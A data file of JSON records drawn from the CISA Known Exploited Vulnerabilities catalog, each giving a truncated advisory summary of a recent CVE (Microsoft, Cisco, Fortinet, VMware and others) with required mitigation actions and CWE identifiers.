"cve_id": "CVE-2026-24061", "source": "cisa_kev", "timestamp": ""} {"id": "CVE-2026-21509", "text": "Microsoft Office Security Feature Bypass Vulnerability\n\nAffected: Microsoft Office\n\nMicrosoft Office contains a security feature bypass vulnerability in which reliance on untrusted inputs in a security decision in Microsoft Office could allow an unauthorized attacker to bypass a security feature locally. Some of the impacted product(s) could be end-of-life (EoL) and/or end-of-service (EoS). Users are advised to discontinue use and/or transition to a supported version.\n\nRequired Action: Apply mit", "cve_id": "CVE-2026-21509", "source": "cisa_kev", "timestamp": ""} {"id": "CVE-2024-37079", "text": "Broadcom VMware vCenter Server Out-of-bounds Write Vulnerability\n\nAffected: Broadcom VMware vCenter Server\n\nBroadcom VMware vCenter Server contains an out-of-bounds write vulnerability in the implementation of the DCERPC protocol. This could allow a malicious actor with network access to vCenter Server to send specially crafted network packets, potentially leading to remote code execution.\n\nRequired Action: Apply mitigations per vendor instructions, follow applicable BOD 22-01 guidance for cloud", "cve_id": "CVE-2024-37079", "source": "cisa_kev", "timestamp": ""} {"id": "CVE-2025-68645", "text": "Synacor Zimbra Collaboration Suite (ZCS) PHP Remote File Inclusion Vulnerability\n\nAffected: Synacor Zimbra Collaboration Suite (ZCS)\n\nSynacor Zimbra Collaboration Suite (ZCS) contains a PHP remote file inclusion vulnerability that could allow for remote attackers to craft requests to the /h/rest endpoint to influence internal request dispatching, allowing inclusion of arbitrary files from the WebRoot directory.\n\nRequired Action: Apply mitigations per vendor instructions, follow applicable BOD 2", "cve_id": "CVE-2025-68645", "source": "cisa_kev", "timestamp": ""} {"id": "CVE-2025-34026", "text": "Versa Concerto Improper Authentication Vulnerability\n\nAffected: Versa Concerto\n\nVersa Concerto SD-WAN orchestration platform contains an improper authentication vulnerability in the Traefik reverse proxy configuration, allowing at attacker to access administrative endpoints. The internal Actuator endpoint can be leveraged for access to heap dumps and trace logs.\n\nRequired Action: Apply mitigations per vendor instructions, follow applicable BOD 22-01 guidance for cloud services, or discontinue us", "cve_id": "CVE-2025-34026", "source": "cisa_kev", "timestamp": ""} {"id": "CVE-2025-31125", "text": "Vite Vitejs Improper Access Control Vulnerability\n\nAffected: Vite Vitejs\n\nVite Vitejs contains an improper access control vulnerability that exposes content of non-allowed files using ?inline&import or ?raw?import. Only apps explicitly exposing the Vite dev server to the network (using --host or server.host config option) are affected.\n\nRequired Action: Apply mitigations per vendor instructions, follow applicable BOD 22-01 guidance for cloud services, or discontinue use of the product if mitigat", "cve_id": "CVE-2025-31125", "source": "cisa_kev", "timestamp": ""} {"id": "CVE-2025-54313", "text": "Prettier eslint-config-prettier Embedded Malicious Code Vulnerability\n\nAffected: Prettier eslint-config-prettier\n\nPrettier eslint-config-prettier contains an embedded malicious code vulnerability. Installing an affected package executes an install.js file that launches the node-gyp.dll malware on Windows.\n\nRequired Action: Apply mitigations per vendor instructions, follow applicable BOD 22-01 guidance for cloud services, or discontinue use of the product if mitigations are unavailable.\n\nCWE(s): ", "cve_id": "CVE-2025-54313", "source": "cisa_kev", "timestamp": ""} {"id": "CVE-2026-20045", "text": "Cisco Unified Communications Products Code Injection Vulnerability\n\nAffected: Cisco Unified Communications Manager\n\nCisco Unified Communications Manager (Unified CM), Cisco Unified Communications Manager Session Management Edition (Unified CM SME), Cisco Unified Communications Manager IM & Presence Service (Unified CM IM&P), Cisco Unity Connection, and Cisco Webex Calling Dedicated Instance contain a code injection vulnerability that could allow the attacker to obtain user-level access to the un", "cve_id": "CVE-2026-20045", "source": "cisa_kev", "timestamp": ""} {"id": "CVE-2026-20805", "text": "Microsoft Windows Information Disclosure Vulnerability\n\nAffected: Microsoft Windows\n\nMicrosoft Windows Desktop Windows Manager contains an information disclosure vulnerability that allows an authorized attacker to disclose information locally.\n\nRequired Action: Apply mitigations per vendor instructions, follow applicable BOD 22-01 guidance for cloud services, or discontinue use of the product if mitigations are unavailable.\n\nCWE(s): CWE-200\n\n[Source: CISA Known Exploited Vulnerabilities Catalog]", "cve_id": "CVE-2026-20805", "source": "cisa_kev", "timestamp": ""} {"id": "CVE-2025-8110", "text": "Gogs Path Traversal Vulnerability\n\nAffected: Gogs Gogs\n\nGogs contains a path traversal vulnerability affecting improper Symbolic link handling in the PutContents API that could allow for code execution.\n\nRequired Action: Apply mitigations per vendor instructions, follow applicable BOD 22-01 guidance for cloud services, or discontinue use of the product if mitigations are unavailable.\n\nCWE(s): CWE-22\n\n[Source: CISA Known Exploited Vulnerabilities Catalog]", "cve_id": "CVE-2025-8110", "source": "cisa_kev", "timestamp": ""} {"id": "CVE-2025-37164", "text": "Hewlett Packard Enterprise (HPE) OneView Code Injection Vulnerability\n\nAffected: Hewlett Packard Enterprise (HPE) OneView\n\nHewlett Packard Enterprise (HPE) OneView contains a code injection vulnerability that allows a remote unauthenticated user to perform remote code execution.\n\nRequired Action: Apply mitigations per vendor instructions, follow applicable BOD 22-01 guidance for cloud services, or discontinue use of the product if mitigations are unavailable.\n\nCWE(s): CWE-94\n\n[Source: CISA Known", "cve_id": "CVE-2025-37164", "source": "cisa_kev", "timestamp": ""} {"id": "CVE-2025-14847", "text": "MongoDB and MongoDB Server Improper Handling of Length Parameter Inconsistency Vulnerability\n\nAffected: MongoDB MongoDB and MongoDB Server\n\nMongoDB Server contains an improper handling of length parameter inconsistency vulnerability in Zlib compressed protocol headers. This vulnerability may allow a read of uninitialized heap memory by an unauthenticated client.\n\nRequired Action: Apply mitigations per vendor instructions, follow applicable BOD 22-01 guidance for cloud services, or discontinue us", "cve_id": "CVE-2025-14847", "source": "cisa_kev", "timestamp": ""} {"id": "CVE-2025-14733", "text": "WatchGuard Firebox Out of Bounds Write Vulnerability\n\nAffected: WatchGuard Firebox\n\nWatchGuard Fireware OS iked process contains an out of bounds write vulnerability in the OS iked process. This vulnerability may allow a remote unauthenticated attacker to execute arbitrary code and affects both the mobile user VPN with IKEv2 and the branch office VPN using IKEv2 when configured with a dynamic gateway peer.\n\nRequired Action: Apply mitigations per vendor instructions, follow applicable BOD 22-01 g", "cve_id": "CVE-2025-14733", "source": "cisa_kev", "timestamp": ""} {"id": "CVE-2025-59374", "text": "ASUS Live Update Embedded Malicious Code Vulnerability\n\nAffected: ASUS Live Update\n\nASUS Live Update contains an embedded malicious code vulnerability client were distributed with unauthorized modifications introduced through a supply chain compromise. The modified builds could cause devices meeting specific targeting conditions to perform unintended actions. The impacted product could be end-of-life (EoL) and/or end-of-service (EoS). Users should discontinue product utilization.\n\nRequired Actio", "cve_id": "CVE-2025-59374", "source": "cisa_kev", "timestamp": ""} {"id": "CVE-2025-40602", "text": "SonicWall SMA1000 Missing Authorization Vulnerability\n\nAffected: SonicWall SMA1000 appliance\n\nSonicWall SMA1000 contains a missing authorization vulnerability that could allow for privilege escalation appliance management console (AMC) of affected devices.\n\nRequired Action: Apply mitigations per vendor instructions, follow applicable BOD 22-01 guidance for cloud services, or discontinue use of the product if mitigations are unavailable\n\nCWE(s): CWE-862, CWE-250\n\n[Source: CISA Known Exploited Vul", "cve_id": "CVE-2025-40602", "source": "cisa_kev", "timestamp": ""} {"id": "CVE-2025-20393", "text": "Cisco Multiple Products Improper Input Validation Vulnerability\n\nAffected: Cisco Multiple Products\n\nCisco Secure Email Gateway, Secure Email, AsyncOS Software, and Web Manager appliances contains an improper input validation vulnerability that allows threat actors to execute arbitrary commands with root privileges on the underlying operating system of an affected appliance.\n\nRequired Action: Apply mitigations per vendor instructions, follow applicable BOD 22-01 guidance for cloud services, or di", "cve_id": "CVE-2025-20393", "source": "cisa_kev", "timestamp": ""} {"id": "CVE-2025-59718", "text": "Fortinet Multiple Products Improper Verification of Cryptographic Signature Vulnerability\n\nAffected: Fortinet Multiple Products\n\nFortinet FortiOS, FortiSwitchMaster, FortiProxy, and FortiWeb contain an improper verification of cryptographic signature vulnerability that may allow an unauthenticated attacker to bypass the FortiCloud SSO login authentication via a crafted SAML message. Please be aware that CVE-2025-59719 pertains to the same problem and is mentioned in the same vendor advisory. Ens", "cve_id": "CVE-2025-59718", "source": "cisa_kev", "timestamp": ""} {"id": "CVE-2025-14611", "text": "Gladinet CentreStack and Triofox Hard Coded Cryptographic Vulnerability\n\nAffected: Gladinet CentreStack and Triofox\n\nGladinet CentreStack and TrioFox contain a hardcoded cryptographic keys vulnerability for their implementation of the AES cryptoscheme. This vulnerability degrades security for public exposed endpoints that may make use of it and may offer arbitrary local file inclusion when provided a specially crafted request without authentication.\n\nRequired Action: Apply mitigations per vendor", "cve_id": "CVE-2025-14611", "source": "cisa_kev", "timestamp": ""} {"id": "CVE-2025-43529", "text": "Apple Multiple Products Use-After-Free WebKit Vulnerability\n\nAffected: Apple Multiple Products\n\nApple iOS, iPadOS, macOS, and other Apple products contain a use-after-free vulnerability in WebKit. Processing maliciously crafted web content may lead to memory corruption. This vulnerability could impact HTML parsers that use WebKit, including but not limited to Apple Safari and non-Apple products which rely on WebKit for HTML processing.\n\nRequired Action: Apply mitigations per vendor instructions,", "cve_id": "CVE-2025-43529", "source": "cisa_kev", "timestamp": ""} {"id": "CVE-2025-14174", "text": "Google Chromium Out of Bounds Memory Access Vulnerability\n\nAffected: Google Chromium\n\nGoogle Chromium contains an out of bounds memory access vulnerability in ANGLE that could allow a remote attacker to perform out of bounds memory access via a crafted HTML page. This vulnerability could affect multiple web browsers that utilize Chromium, including, but not limited to, Google Chrome, Microsoft Edge, and Opera.\n\nRequired Action: Apply mitigations per vendor instructions, follow applicable BOD 22-", "cve_id": "CVE-2025-14174", "source": "cisa_kev", "timestamp": ""} {"id": "CVE-2025-58360", "text": "OSGeo GeoServer Improper Restriction of XML External Entity Reference Vulnerability\n\nAffected: OSGeo GeoServer\n\nOSGeo GeoServer contains an improper restriction of XML external entity reference vulnerability that occurs when the application accepts XML input through a specific endpoint /geoserver/wms operation GetMap and could allow an attacker to define external entities within the XML request.\n\nRequired Action: Apply mitigations per vendor instructions, follow applicable BOD 22-01 guidance for", "cve_id": "CVE-2025-58360", "source": "cisa_kev", "timestamp": ""} {"id": "CVE-2025-6218", "text": "RARLAB WinRAR Path Traversal Vulnerability\n\nAffected: RARLAB WinRAR\n\nRARLAB WinRAR contains a path traversal vulnerability allowing an attacker to execute code in the context of the current user.\n\nRequired Action: Apply mitigations per vendor instructions, follow applicable BOD 22-01 guidance for cloud services, or discontinue use of the product if mitigations are unavailable.\n\nCWE(s): CWE-22\n\n[Source: CISA Known Exploited Vulnerabilities Catalog]", "cve_id": "CVE-2025-6218", "source": "cisa_kev", "timestamp": ""} {"id": "CVE-2025-62221", "text": "Microsoft Windows Use After Free Vulnerability\n\nAffected: Microsoft Windows\n\nMicrosoft Windows Cloud Files Mini Filter Driver contains a use after free vulnerability that can allow an authorized attacker to elevate privileges locally.\n\nRequired Action: Apply mitigations per vendor instructions, follow applicable BOD 22-01 guidance for cloud services, or discontinue use of the product if mitigations are unavailable.\n\nCWE(s): CWE-416\n\n[Source: CISA Known Exploited Vulnerabilities Catalog]", "cve_id": "CVE-2025-62221", "source": "cisa_kev", "timestamp": ""} {"id": "CVE-2025-66644", "text": "Array Networks ArrayOS AG OS Command Injection Vulnerability\n\nAffected: Array Networks ArrayOS AG\n\nArray Networks ArrayOS AG contains an OS command injection vulnerability that could allow an attacker to execute arbitrary commands.\n\nRequired Action: Apply mitigations per vendor instructions, follow applicable BOD 22-01 guidance for cloud services, or discontinue use of the product if mitigations are unavailable.\n\nCWE(s): CWE-78\n\n[Source: CISA Known Exploited Vulnerabilities Catalog]", "cve_id": "CVE-2025-66644", "source": "cisa_kev", "timestamp": ""} {"id": "CVE-2025-55182", "text": "Meta React Server Components Remote Code Execution Vulnerability\n\nAffected: Meta React Server Components\n\nMeta React Server Components contains a remote code execution vulnerability that could allow unauthenticated remote code execution by exploiting a flaw in how React decodes payloads sent to React Server Function endpoints. Please note CVE-2025-66478 has been rejected, but it is associated with CVE-2025- 55182.\n\nRequired Action: Apply mitigations per vendor instructions, follow applicable BOD", "cve_id": "CVE-2025-55182", "source": "cisa_kev", "timestamp": ""} {"id": "CVE-2025-48633", "text": "Android Framework Information Disclosure Vulnerability\n\nAffected: Android Framework\n\nAndroid Framework contains an unspecified vulnerability that allows for information disclosure.\n\nRequired Action: Apply mitigations per vendor instructions, follow applicable BOD 22-01 guidance for cloud services, or discontinue use of the product if mitigations are unavailable.\n\n[Source: CISA Known Exploited Vulnerabilities Catalog]", "cve_id": "CVE-2025-48633", "source": "cisa_kev", "timestamp": ""} {"id": "CVE-2025-48572", "text": "Android Framework Privilege Escalation Vulnerability\n\nAffected: Android Framework\n\nAndroid Framework contains an unspecified vulnerability that allows for privilege escalation.\n\nRequired Action: Apply mitigations per vendor instructions, follow applicable BOD 22-01 guidance for cloud services, or discontinue use of the product if mitigations are unavailable.\n\n[Source: CISA Known Exploited Vulnerabilities Catalog]", "cve_id": "CVE-2025-48572", "source": "cisa_kev", "timestamp": ""} {"id": "CVE-2025-61757", "text": "Oracle Fusion Middleware Missing Authentication for Critical Function Vulnerability\n\nAffected: Oracle Fusion Middleware\n\nOracle Fusion Middleware contains a missing authentication for critical function vulnerability, allowing unauthenticated remote attackers to take over Identity Manager.\n\nRequired Action: Apply mitigations per vendor instructions, follow applicable BOD 22-01 guidance for cloud services, or discontinue use of the product if mitigations are unavailable.\n\nCWE(s): CWE-306\n\n[Source:", "cve_id": "CVE-2025-61757", "source": "cisa_kev", "timestamp": ""} {"id": "CVE-2025-13223", "text": "Google Chromium V8 Type Confusion Vulnerability\n\nAffected: Google Chromium V8\n\nGoogle Chromium V8 contains a type confusion vulnerability that allows for heap corruption.\n\nRequired Action: Apply mitigations per vendor instructions, follow applicable BOD 22-01 guidance for cloud services, or discontinue use of the product if mitigations are unavailable.\n\nCWE(s): CWE-843\n\n[Source: CISA Known Exploited Vulnerabilities Catalog]", "cve_id": "CVE-2025-13223", "source": "cisa_kev", "timestamp": ""} {"id": "CVE-2025-58034", "text": "Fortinet FortiWeb OS Command Injection Vulnerability\n\nAffected: Fortinet FortiWeb\n\nFortinet FortiWeb contains an OS command Injection vulnerability that may allow an authenticated attacker to execute unauthorized code on the underlying system via crafted HTTP requests or CLI commands.\n\nRequired Action: Apply mitigations per vendor instructions, follow applicable BOD 22-01 guidance for cloud services, or discontinue use of the product if mitigations are unavailable.\n\nCWE(s): CWE-78\n\n[Source: CISA", "cve_id": "CVE-2025-58034", "source": "cisa_kev", "timestamp": ""} {"id": "CVE-2025-64446", "text": "Fortinet FortiWeb Path Traversal Vulnerability\n\nAffected: Fortinet FortiWeb\n\nFortinet FortiWeb contains a relative path traversal vulnerability that may allow an unauthenticated attacker to execute administrative commands on the system via crafted HTTP or HTTPS requests.\n\nRequired Action: Apply mitigations per vendor instructions, follow applicable BOD 22-01 guidance for cloud services, or discontinue use of the product if mitigations are unavailable.\n\nCWE(s): CWE-23\n\n[Source: CISA Known Exploit", "cve_id": "CVE-2025-64446", "source": "cisa_kev", "timestamp": ""} {"id": "CVE-2025-12480", "text": "Gladinet Triofox Improper Access Control Vulnerability\n\nAffected: Gladinet Triofox\n\nGladinet Triofox contains an improper access control vulnerability that allows access to initial setup pages even after setup is complete.\n\nRequired Action: Apply mitigations per vendor instructions, follow applicable BOD 22-01 guidance for cloud services, or discontinue use of the product if mitigations are unavailable.\n\nCWE(s): CWE-284\n\n[Source: CISA Known Exploited Vulnerabilities Catalog]", "cve_id": "CVE-2025-12480", "source": "cisa_kev", "timestamp": ""} {"id": "CVE-2025-62215", "text": "Microsoft Windows Race Condition Vulnerability\n\nAffected: Microsoft Windows\n\nMicrosoft Windows Kernel contains a race condition vulnerability that allows a local attacker with low-level privileges to escalate privileges. Successful exploitation of this vulnerability could enable the attacker to gain SYSTEM-level access.\n\nRequired Action: Apply mitigations per vendor instructions, follow applicable BOD 22-01 guidance for cloud services, or discontinue use of the product if mitigations are unavail", "cve_id": "CVE-2025-62215", "source": "cisa_kev", "timestamp": ""} {"id": "CVE-2025-9242", "text": "WatchGuard Firebox Out-of-Bounds Write Vulnerability\n\nAffected: WatchGuard Firebox\n\nWatchGuard Firebox contains an out-of-bounds write vulnerability in the OS iked process that may allow a remote unauthenticated attacker to execute arbitrary code.\n\nRequired Action: Apply mitigations per vendor instructions, follow applicable BOD 22-01 guidance for cloud services, or discontinue use of the product if mitigations are unavailable.\n\nCWE(s): CWE-787\n\n[Source: CISA Known Exploited Vulnerabilities Cata", "cve_id": "CVE-2025-9242", "source": "cisa_kev", "timestamp": ""} {"id": "CVE-2025-21042", "text": "Samsung Mobile Devices Out-of-Bounds Write Vulnerability\n\nAffected: Samsung Mobile Devices\n\nSamsung mobile devices contain an out-of-bounds write vulnerability in libimagecodec.quram.so. This vulnerability could allow remote attackers to execute arbitrary code.\n\nRequired Action: Apply mitigations per vendor instructions, follow applicable BOD 22-01 guidance for cloud services, or discontinue use of the product if mitigations are unavailable.\n\nCWE(s): CWE-787\n\n[Source: CISA Known Exploited Vulner", "cve_id": "CVE-2025-21042", "source": "cisa_kev", "timestamp": ""} {"id": "CVE-2025-48703", "text": "CWP Control Web Panel OS Command Injection Vulnerability\n\nAffected: CWP Control Web Panel\n\nCWP Control Web Panel (formerly CentOS Web Panel) contains an OS command Injection vulnerability that allows unauthenticated remote code execution via shell metacharacters in the t_total parameter in a filemanager changePerm request. A valid non-root username must be known.\n\nRequired Action: Apply mitigations per vendor instructions, follow applicable BOD 22-01 guidance for cloud services, or discontinue u", "cve_id": "CVE-2025-48703", "source": "cisa_kev", "timestamp": ""} {"id": "CVE-2025-11371", "text": "Gladinet CentreStack and Triofox Files or Directories Accessible to External Parties Vulnerability\n\nAffected: Gladinet CentreStack and Triofox\n\nGladinet CentreStack and Triofox contains a files or directories accessible to external parties vulnerability that allows unintended disclosure of system files.\n\nRequired Action: Apply mitigations per vendor instructions, follow applicable BOD 22-01 guidance for cloud services, or discontinue use of the product if mitigations are unavailable.\n\nCWE(s): CW", "cve_id": "CVE-2025-11371", "source": "cisa_kev", "timestamp": ""} {"id": "CVE-2025-41244", "text": "Broadcom VMware Aria Operations and VMware Tools Privilege Defined with Unsafe Actions Vulnerability\n\nAffected: Broadcom VMware Aria Operations and VMware Tools\n\nBroadcom VMware Aria Operations and VMware Tools contain a privilege defined with unsafe actions vulnerability. A malicious local actor with non-administrative privileges having access to a VM with VMware Tools installed and managed by Aria Operations with SDMP enabled may exploit this vulnerability to escalate privileges to root on the", "cve_id": "CVE-2025-41244", "source": "cisa_kev", "timestamp": ""} {"id": "CVE-2025-24893", "text": "XWiki Platform Eval Injection Vulnerability\n\nAffected: XWiki Platform\n\nXWiki Platform contains an eval injection vulnerability that could allow any guest to perform arbitrary remote code execution through a request to SolrSearch.\n\nRequired Action: Apply mitigations per vendor instructions, follow applicable BOD 22-01 guidance for cloud services, or discontinue use of the product if mitigations are unavailable.\n\nCWE(s): CWE-95\n\n[Source: CISA Known Exploited Vulnerabilities Catalog]", "cve_id": "CVE-2025-24893", "source": "cisa_kev", "timestamp": ""} {"id": "CVE-2025-6204", "text": "Dassault Systèmes DELMIA Apriso Code Injection Vulnerability\n\nAffected: Dassault Systèmes DELMIA Apriso\n\nDassault Systèmes DELMIA Apriso contains a code injection vulnerability that could allow an attacker to execute arbitrary code.\n\nRequired Action: Apply mitigations per vendor instructions, follow applicable BOD 22-01 guidance for cloud services, or discontinue use of the product if mitigations are unavailable.\n\nCWE(s): CWE-94\n\n[Source: CISA Known Exploited Vulnerabilities Catalog]", "cve_id": "CVE-2025-6204", "source": "cisa_kev", "timestamp": ""} {"id": "CVE-2025-6205", "text": "Dassault Systèmes DELMIA Apriso Missing Authorization Vulnerability\n\nAffected: Dassault Systèmes DELMIA Apriso\n\nDassault Systèmes DELMIA Apriso contains a missing authorization vulnerability that could allow an attacker to gain privileged access to the application.\n\nRequired Action: Apply mitigations per vendor instructions, follow applicable BOD 22-01 guidance for cloud services, or discontinue use of the product if mitigations are unavailable.\n\nCWE(s): CWE-862\n\n[Source: CISA Known Exploited Vu", "cve_id": "CVE-2025-6205", "source": "cisa_kev", "timestamp": ""} {"id": "CVE-2025-54236", "text": "Adobe Commerce and Magento Improper Input Validation Vulnerability\n\nAffected: Adobe Commerce and Magento\n\nAdobe Commerce and Magento Open Source contain an improper input validation vulnerability that could allow an attacker to take over customer accounts through the Commerce REST API.\n\nRequired Action: Apply mitigations per vendor instructions, follow applicable BOD 22-01 guidance for cloud services, or discontinue use of the product if mitigations are unavailable.\n\nCWE(s): CWE-20\n\n[Source: CIS", "cve_id": "CVE-2025-54236", "source": "cisa_kev", "timestamp": ""} {"id": "CVE-2025-59287", "text": "Microsoft Windows Server Update Service (WSUS) Deserialization of Untrusted Data Vulnerability\n\nAffected: Microsoft Windows\n\nMicrosoft Windows Server Update Service (WSUS) contains a deserialization of untrusted data vulnerability that allows for remote code execution.\n\nRequired Action: Apply mitigations per vendor instructions, follow applicable BOD 22-01 guidance for cloud services, or discontinue use of the product if mitigations are unavailable.\n\nCWE(s): CWE-502\n\n[Source: CISA Known Exploite", "cve_id": "CVE-2025-59287", "source": "cisa_kev", "timestamp": ""} {"id": "CVE-2025-61932", "text": "Motex LANSCOPE Endpoint Manager Improper Verification of Source of a Communication Channel Vulnerability\n\nAffected: Motex LANSCOPE Endpoint Manager\n\nMotex LANSCOPE Endpoint Manager contains an improper verification of source of a communication channel vulnerability allowing an attacker to execute arbitrary code by sending specially crafted packets.\n\nRequired Action: Apply mitigations per vendor instructions, follow applicable BOD 22-01 guidance for cloud services, or discontinue use of the produ", "cve_id": "CVE-2025-61932", "source": "cisa_kev", "timestamp": ""} {"id": "CVE-2025-2746", "text": "Kentico Xperience CMS Authentication Bypass Using an Alternate Path or Channel Vulnerability\n\nAffected: Kentico Xperience CMS\n\nKentico Xperience CMS contains an authentication bypass using an alternate path or channel vulnerability that could allow an attacker to control administrative objects.\n\nRequired Action: Apply mitigations per vendor instructions, follow applicable BOD 22-01 guidance for cloud services, or discontinue use of the product if mitigations are unavailable.\n\nCWE(s): CWE-288\n\n[S", "cve_id": "CVE-2025-2746", "source": "cisa_kev", "timestamp": ""} {"id": "CVE-2025-33073", "text": "Microsoft Windows SMB Client Improper Access Control Vulnerability\n\nAffected: Microsoft Windows\n\nMicrosoft Windows SMB Client contains an improper access control vulnerability that could allow for privilege escalation. An attacker could execute a specially crafted malicious script to coerce the victim machine to connect back to the attack system using SMB and authenticate.\n\nRequired Action: Apply mitigations per vendor instructions, follow applicable BOD 22-01 guidance for cloud services, or dis", "cve_id": "CVE-2025-33073", "source": "cisa_kev", "timestamp": ""} {"id": "CVE-2025-61884", "text": "Oracle E-Business Suite Server-Side Request Forgery (SSRF) Vulnerability\n\nAffected: Oracle E-Business Suite\n\nOracle E-Business Suite contains a server-side request forgery (SSRF) vulnerability in the Runtime component of Oracle Configurator. This vulnerability is remotely exploitable without authentication.\n\nRequired Action: Apply mitigations per vendor instructions, follow applicable BOD 22-01 guidance for cloud services, or discontinue use of the product if mitigations are unavailable.\n\nRansom", "cve_id": "CVE-2025-61884", "source": "cisa_kev", "timestamp": ""} {"id": "CVE-2025-54253", "text": "Adobe Experience Manager Forms Code Execution Vulnerability\n\nAffected: Adobe Experience Manager (AEM) Forms\n\nAdobe Experience Manager Forms in JEE contains an unspecified vulnerability that allows for arbitrary code execution.\n\nRequired Action: Apply mitigations per vendor instructions, follow applicable BOD 22-01 guidance for cloud services, or discontinue use of the product if mitigations are unavailable.\n\n[Source: CISA Known Exploited Vulnerabilities Catalog]", "cve_id": "CVE-2025-54253", "source": "cisa_kev", "timestamp": ""} {"id": "CVE-2025-47827", "text": "IGEL OS Use of a Key Past its Expiration Date Vulnerability\n\nAffected: IGEL IGEL OS\n\nIGEL OS contains a use of a key past its expiration date vulnerability that allows for Secure Boot bypass. The igel-flash-driver module improperly verifies a cryptographic signature. Ultimately, a crafted root filesystem can be mounted from an unverified SquashFS image.\n\nRequired Action: Apply mitigations per vendor instructions, follow applicable BOD 22-01 guidance for cloud services, or discontinue use of the ", "cve_id": "CVE-2025-47827", "source": "cisa_kev", "timestamp": ""} {"id": "CVE-2025-24990", "text": "Microsoft Windows Untrusted Pointer Dereference Vulnerability\n\nAffected: Microsoft Windows\n\nMicrosoft Windows Agere Modem Driver contains an untrusted pointer dereference vulnerability that allows for privilege escalation. An attacker who successfully exploited this vulnerability could gain administrator privileges.\n\nRequired Action: Apply mitigations per vendor instructions, follow applicable BOD 22-01 guidance for cloud services, or discontinue use of the product if mitigations are unavailable", "cve_id": "CVE-2025-24990", "source": "cisa_kev", "timestamp": ""} {"id": "CVE-2025-59230", "text": "Microsoft Windows Improper Access Control Vulnerability\n\nAffected: Microsoft Windows\n\nMicrosoft Windows contains an improper access control vulnerability in Windows Remote Access Connection Manager which could allow an authorized attacker to elevate privileges locally.\n\nRequired Action: Apply mitigations per vendor instructions, follow applicable BOD 22-01 guidance for cloud services, or discontinue use of the product if mitigations are unavailable.\n\nCWE(s): CWE-284\n\n[Source: CISA Known Exploite", "cve_id": "CVE-2025-59230", "source": "cisa_kev", "timestamp": ""} {"id": "CVE-2025-27915", "text": "Synacor Zimbra Collaboration Suite (ZCS) Cross-site Scripting Vulnerability\n\nAffected: Synacor Zimbra Collaboration Suite (ZCS)\n\nSynacor Zimbra Collaboration Suite (ZCS) contains a cross-site scripting vulnerability that exists in the Classic Web Client due to insufficient sanitization of HTML content in ICS files. When a user views an e-mail message containing a malicious ICS entry, its embedded JavaScript executes via an ontoggle event inside a tag. This allows an attacker to run arbitrary Jav", "cve_id": "CVE-2025-27915", "source": "cisa_kev", "timestamp": ""} {"id": "CVE-2025-61882", "text": "Oracle E-Business Suite Unspecified Vulnerability\n\nAffected: Oracle E-Business Suite\n\nOracle E-Business Suite contains an unspecified vulnerability in the BI Publisher Integration component. The vulnerability allows unauthenticated attacker with network access via HTTP to compromise Oracle Concurrent Processing. Successful attacks can result in takeover of Oracle Concurrent Processing.\n\nRequired Action: Apply mitigations per vendor instructions, follow applicable BOD 22-01 guidance for cloud ser", "cve_id": "CVE-2025-61882", "source": "cisa_kev", "timestamp": ""} {"id": "CVE-2025-21043", "text": "Samsung Mobile Devices Out-of-Bounds Write Vulnerability\n\nAffected: Samsung Mobile Devices\n\nSamsung mobile devices contain an out-of-bounds write vulnerability in libimagecodec.quram.so which allows remote attackers to execute arbitrary code.\n\nRequired Action: Apply mitigations per vendor instructions, follow applicable BOD 22-01 guidance for cloud services, or discontinue use of the product if mitigations are unavailable.\n\nCWE(s): CWE-787\n\n[Source: CISA Known Exploited Vulnerabilities Catalog]", "cve_id": "CVE-2025-21043", "source": "cisa_kev", "timestamp": ""} {"id": "CVE-2025-4008", "text": "Smartbedded Meteobridge Command Injection Vulnerability\n\nAffected: Smartbedded Meteobridge\n\nSmartbedded Meteobridge contains a command injection vulnerability that could allow remote unauthenticated attackers to gain arbitrary command execution with elevated privileges (root) on affected devices.\n\nRequired Action: Apply mitigations per vendor instructions, follow applicable BOD 22-01 guidance for cloud services, or discontinue use of the product if mitigations are unavailable.\n\nCWE(s): CWE-306, ", "cve_id": "CVE-2025-4008", "source": "cisa_kev", "timestamp": ""} {"id": "CVE-2025-32463", "text": "Sudo Inclusion of Functionality from Untrusted Control Sphere Vulnerability\n\nAffected: Sudo Sudo\n\nSudo contains an inclusion of functionality from untrusted control sphere vulnerability. This vulnerability could allow local attacker to leverage sudo’s -R (--chroot) option to run arbitrary commands as root, even if they are not listed in the sudoers file.\n\nRequired Action: Apply mitigations per vendor instructions, follow applicable BOD 22-01 guidance for cloud services, or discontinue use of the", "cve_id": "CVE-2025-32463", "source": "cisa_kev", "timestamp": ""} {"id": "CVE-2025-59689", "text": "Libraesva Email Security Gateway Command Injection Vulnerability\n\nAffected: Libraesva Email Security Gateway\n\nLibraesva Email Security Gateway (ESG) contains a command injection vulnerability which allows command injection via a compressed e-mail attachment.\n\nRequired Action: Apply mitigations per vendor instructions, follow applicable BOD 22-01 guidance for cloud services, or discontinue use of the product if mitigations are unavailable.\n\nCWE(s): CWE-77\n\n[Source: CISA Known Exploited Vulnerabil", "cve_id": "CVE-2025-59689", "source": "cisa_kev", "timestamp": ""} {"id": "CVE-2025-10035", "text": "Fortra GoAnywhere MFT Deserialization of Untrusted Data Vulnerability\n\nAffected: Fortra GoAnywhere MFT\n\nFortra GoAnywhere MFT contains a deserialization of untrusted data vulnerability allows an actor with a validly forged license response signature to deserialize an arbitrary actor-controlled object, possibly leading to command injection.\n\nRequired Action: Apply mitigations per vendor instructions, follow applicable BOD 22-01 guidance for cloud services, or discontinue use of the product if mit", "cve_id": "CVE-2025-10035", "source": "cisa_kev", "timestamp": ""} {"id": "CVE-2025-20352", "text": "Cisco IOS and IOS XE Software SNMP Denial of Service and Remote Code Execution Vulnerability\n\nAffected: Cisco IOS and IOS XE\n\nCisco IOS and IOS XE contains a stack-based buffer overflow vulnerability in the Simple Network Management Protocol (SNMP) subsystem that could allow for denial of service or remote code execution. A successful exploit could allow a low-privileged attacker to cause the affected system to reload, resulting in a DoS condition, or allow a high-privileged attacker to execute ", "cve_id": "CVE-2025-20352", "source": "cisa_kev", "timestamp": ""} {"id": "CVE-2025-20362", "text": "Cisco Secure Firewall Adaptive Security (ASA) Appliance and Secure Firewall Threat Defense (FTD) Missing Authorization Vulnerability\n\nAffected: Cisco Secure Firewall Adaptive Security Appliance and Secure Firewall Threat Defense\n\nCisco Secure Firewall Adaptive Security (ASA) Appliance and Secure Firewall Threat Defense (FTD) Software VPN Web Server contain a missing authorization vulnerability. This vulnerability could be chained with CVE-2025-20333.\n\nRequired Action: The KEV due date refers to ", "cve_id": "CVE-2025-20362", "source": "cisa_kev", "timestamp": ""} {"id": "CVE-2025-20333", "text": "Cisco Secure Firewall Adaptive Security Appliance (ASA) and 